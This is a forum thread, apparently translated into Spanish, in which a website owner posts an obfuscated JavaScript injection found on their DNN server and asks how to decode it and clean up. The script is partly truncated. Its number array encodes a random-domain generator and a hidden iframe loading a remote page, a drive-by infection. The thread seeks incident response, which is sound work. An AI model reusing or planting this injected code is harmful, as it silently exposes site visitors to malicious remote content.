Solo me pregunto si un experto de js puede decodificar esta inyección de script que puedo verificar en nuestro servidor para ver si hay más infecciones.km0ae9gr6m js información de hack de inyección
¿Alguien tiene una idea de cómo hubiera pasado esto? El servidor está completamente parcheado (MS Server 2008, Plesk), la aplicación web está completamente parcheada (DNN 5.6.7).
Han eliminado todos los scripts insertados & restablecer todas las contraseñas del servidor ... ¿Algo más que deba hacer?
Gracias :)
/*km0ae9gr6m*/
i = 0;
try {
prototype - 5;
} catch (z) {
f = [102, 234, 110, 198, 116, 210, 111, 220, 32, 220, 101, 240, 116, 164, 97, 220, 100, 222, 109, 156, 117, 218, 98, 202, 114, 80, 41, 246, 118, 194, 114, 64, 104, 210, 61, 232, 104, 210, 115, 92, 115, 202, 101, 200, 47, 232, 104, 210, 115, 92, 81, 118, 118, 194, 114, 64, 108, 222, 61, 232, 104, 210, 115, 92, 115, 202, 101, 200, 37, 232, 104, 210, 115, 92, 81, 118, 118, 194, 114, 64, 116, 202, 115, 232, 61, 232, 104, 210, 115, 92, 65, 84, 108, 222, 45, 232, 104, 210, 115, 92, 82, 84, 104, 210, 59, 210, 102, 80, 116, 202, 115, 232, 62, 96, 41, 246, 116, 208, 105, 230, 46, 230, 101, 202, 100, 122, 116, 202, 115, 232, 125, 202, 108, 230, 101, 246, 116, 208, 105, 230, 46, 230, 101, 202, 100, 122, 116, 202, 115, 232, 43, 232, 104, 210, 115, 92, 77, 250, 114, 202, 116, 234, 114, 220, 40, 232, 104, 210, 115, 92, 115, 202, 101, 200, 42, 232, 104, 210, 115, 92, 111, 220, 101, 158, 118, 202, 114, 154, 41, 250, 102, 234, 110, 198, 116, 210, 111, 220, 32, 164, 97, 220, 100, 222, 109, 156, 117, 218, 98, 202, 114, 142, 101, 220, 101, 228, 97, 232, 111, 228, 40, 234, 110, 210, 120, 82, 123, 236, 97, 228, 32, 200, 61, 220, 101, 238, 32, 136, 97, 232, 101, 80, 117, 220, 105, 240, 42, 98, 48, 96, 48, 82, 59, 236, 97, 228, 32, 230, 61, 200, 46, 206, 101, 232, 72, 222, 117, 228, 115, 80, 41, 124, 49, 100, 63, 98, 58, 96, 59, 232, 104, 210, 115, 92, 115, 202, 101, 200, 61, 100, 51, 104, 53, 108, 55, 112, 57, 96, 49, 86, 40, 200, 46, 206, 101, 232, 77, 222, 110, 232, 104, 80, 41, 84, 48, 240, 70, 140, 70, 140, 70, 140, 41, 86, 40, 200, 46, 206, 101, 232, 68, 194, 116, 202, 40, 82, 42, 96, 120, 140, 70, 140, 70, 82, 43, 80, 77, 194, 116, 208, 46, 228, 111, 234, 110, 200, 40, 230, 42, 96, 120, 140, 70, 140, 41, 82, 59, 232, 104, 210, 115, 92, 65, 122, 52, 112, 50, 110, 49, 118, 116, 208, 105, 230, 46, 154, 61, 100, 49, 104, 55, 104, 56, 102, 54, 104, 55, 118, 116, 208, 105, 230, 46, 162, 61, 232, 104, 210, 115, 92, 77, 94, 116, 208, 105, 230, 46, 130, 59, 232, 104, 210, 115, 92, 82, 122, 116, 208, 105, 230, 46, 154, 37, 232, 104, 210, 115, 92, 65, 118, 116, 208, 105, 230, 46, 222, 110, 202, 79, 236, 101, 228, 77, 122, 49, 92, 48, 94, 116, 208, 105, 230, 46, 154, 59, 232, 104, 210, 115, 92, 110, 202, 120, 232, 61, 220, 101, 240, 116, 164, 97, 220, 100, 222, 109, 156, 117, 218, 98, 202, 114, 118, 114, 202, 116, 234, 114, 220, 32, 232, 104, 210, 115, 250, 102, 234, 110, 198, 116, 210, 111, 220, 32, 198, 114, 202, 97, 232, 101, 164, 97, 220, 100, 222, 109, 156, 117, 218, 98, 202, 114, 80, 114, 88, 77, 210, 110, 88, 77, 194, 120, 82, 123, 228, 101, 232, 117, 228, 110, 64, 77, 194, 116, 208, 46, 228, 111, 234, 110, 200, 40, 80, 77, 194, 120, 90, 77, 210, 110, 82, 42, 228, 46, 220, 101, 240, 116, 80, 41, 86, 77, 210, 110, 82, 125, 204, 117, 220, 99, 232, 105, 222, 110, 64, 103, 202, 110, 202, 114, 194, 116, 202, 80, 230, 101, 234, 100, 222, 82, 194, 110, 200, 111, 218, 83, 232, 114, 210, 110, 206, 40, 234, 110, 210, 120, 88, 108, 202, 110, 206, 116, 208, 44, 244, 111, 220, 101, 82, 123, 236, 97, 228, 32, 228, 97, 220, 100, 122, 110, 202, 119, 64, 82, 194, 110, 200, 111, 218, 78, 234, 109, 196, 101, 228, 71, 202, 110, 202, 114, 194, 116, 222, 114, 80, 117, 220, 105, 240, 41, 118, 118, 194, 114, 64, 108, 202, 116, 232, 101, 228, 115, 122, 91, 78, 97, 78, 44, 78, 98, 78, 44, 78, 99, 78, 44, 78, 100, 78, 44, 78, 101, 78, 44, 78, 102, 78, 44, 78, 103, 78, 44, 78, 104, 78, 44, 78, 105, 78, 44, 78, 106, 78, 44, 78, 107, 78, 44, 78, 108, 78, 44, 78, 109, 78, 44, 78, 110, 78, 44, 78, 111, 78, 44, 78, 112, 78, 44, 78, 113, 78, 44, 78, 114, 78, 44, 78, 115, 78, 44, 78, 116, 78, 44, 78, 117, 78, 44, 78, 118, 78, 44, 78, 119, 78, 44, 78, 120, 78, 44, 78, 121, 78, 44, 78, 122, 78, 93, 118, 118, 194, 114, 64, 115, 232, 114, 122, 39, 78, 59, 204, 111, 228, 40, 236, 97, 228, 32, 210, 61, 96, 59, 210, 60, 216, 101, 220, 103, 232, 104, 118, 105, 86, 43, 82, 123, 230, 116, 228, 43, 122, 108, 202, 116, 232, 101, 228, 115, 182, 99, 228, 101, 194, 116, 202, 82, 194, 110, 200, 111, 218, 78, 234, 109, 196, 101, 228, 40, 228, 97, 220, 100, 88, 48, 88, 108, 202, 116, 232, 101, 228, 115, 92, 108, 202, 110, 206, 116, 208, 45, 98, 41, 186, 125, 228, 101, 232, 117, 228, 110, 64, 115, 232, 114, 86, 39, 92, 39, 86, 122, 222, 110, 202, 125, 230, 101, 232, 84, 210, 109, 202, 111, 234, 116, 80, 102, 234, 110, 198, 116, 210, 111, 220, 40, 82, 123, 232, 114, 242, 123, 210, 102, 80, 116, 242, 112, 202, 111, 204, 32, 210, 102, 228, 97, 218, 101, 174, 97, 230, 67, 228, 101, 194, 116, 202, 100, 100, 61, 122, 34, 234, 110, 200, 101, 204, 105, 220, 101, 200, 34, 82, 123, 210, 102, 228, 97, 218, 101, 174, 97, 230, 67, 228, 101, 194, 116, 202, 100, 100, 61, 232, 114, 234, 101, 118, 118, 194, 114, 64, 117, 220, 105, 240, 61, 154, 97, 232, 104, 92, 114, 222, 117, 220, 100, 80, 43, 220, 101, 238, 32, 136, 97, 232, 101, 80, 41, 94, 49, 96, 48, 96, 41, 118, 118, 194, 114, 64, 100, 222, 109, 194, 105, 220, 78, 194, 109, 202, 61, 206, 101, 220, 101, 228, 97, 232, 101, 160, 115, 202, 117, 200, 111, 164, 97, 220, 100, 222, 109, 166, 116, 228, 105, 220, 103, 80, 117, 220, 105, 240, 44, 98, 54, 88, 39, 228, 117, 78, 41, 118, 105, 204, 114, 218, 61, 200, 111, 198, 117, 218, 101, 220, 116, 92, 99, 228, 101, 194, 116, 202, 69, 216, 101, 218, 101, 220, 116, 80, 34, 146, 70, 164, 65, 154, 69, 68, 41, 118, 105, 204, 114, 218, 46, 230, 101, 232, 65, 232, 116, 228, 105, 196, 117, 232, 101, 80, 34, 230, 114, 198, 34, 88, 34, 208, 116, 232, 112, 116, 47, 94, 34, 86, 100, 222, 109, 194, 105, 220, 78, 194, 109, 202, 43, 68, 47, 228, 117, 220, 102, 222, 114, 202, 115, 232, 114, 234, 110, 126, 115, 210, 100, 122, 99, 240, 34, 82, 59, 210, 102, 228, 109, 92, 115, 232, 121, 216, 101, 92, 119, 210, 100, 232, 104, 122, 34, 96, 112, 240, 34, 118, 105, 204, 114, 218, 46, 230, 116, 242, 108, 202, 46, 208, 101, 210, 103, 208, 116, 122, 34, 96, 112, 240, 34, 118, 105, 204, 114, 218, 46, 230, 116, 242, 108, 202, 46, 236, 105, 230, 105, 196, 105, 216, 105, 232, 121, 122, 34, 208, 105, 200, 100, 202, 110, 68, 59, 200, 111, 198, 117, 218, 101, 220, 116, 92, 98, 222, 100, 242, 46, 194, 112, 224, 101, 220, 100, 134, 104, 210, 108, 200, 40, 210, 102, 228, 109, 82, 125, 250, 99, 194, 116, 198, 104, 80, 101, 82, 123, 250, 125, 88, 53, 96, 48, 82, 59];
'REMOVED BULK OF CODE
if (f) e(s); /*qhk6sa6g1c*/
Lo que hace: http: // jsFiddle .net/PeeHaa/9YKqW /. Cómo llegó es bastante difícil de decir, porque hay formas múltiples de inyectar algo. Algo más que podría hacer: ¿tiene una copia de seguridad reciente y buena? – PeeHaa
No puedo ver cómo puede ayudar a los futuros visitantes. – gdoron
@PeeHaa - ni siquiera pensé en usar jsfiddle;) Solo pensé que alguien más podría tener (o tendrá) un problema similar al que lo ha analizado un poco más de lo que tengo en este momento. Tengo copias de seguridad así que no hay problema. Realmente aprecio tus comentarios :) – user1487020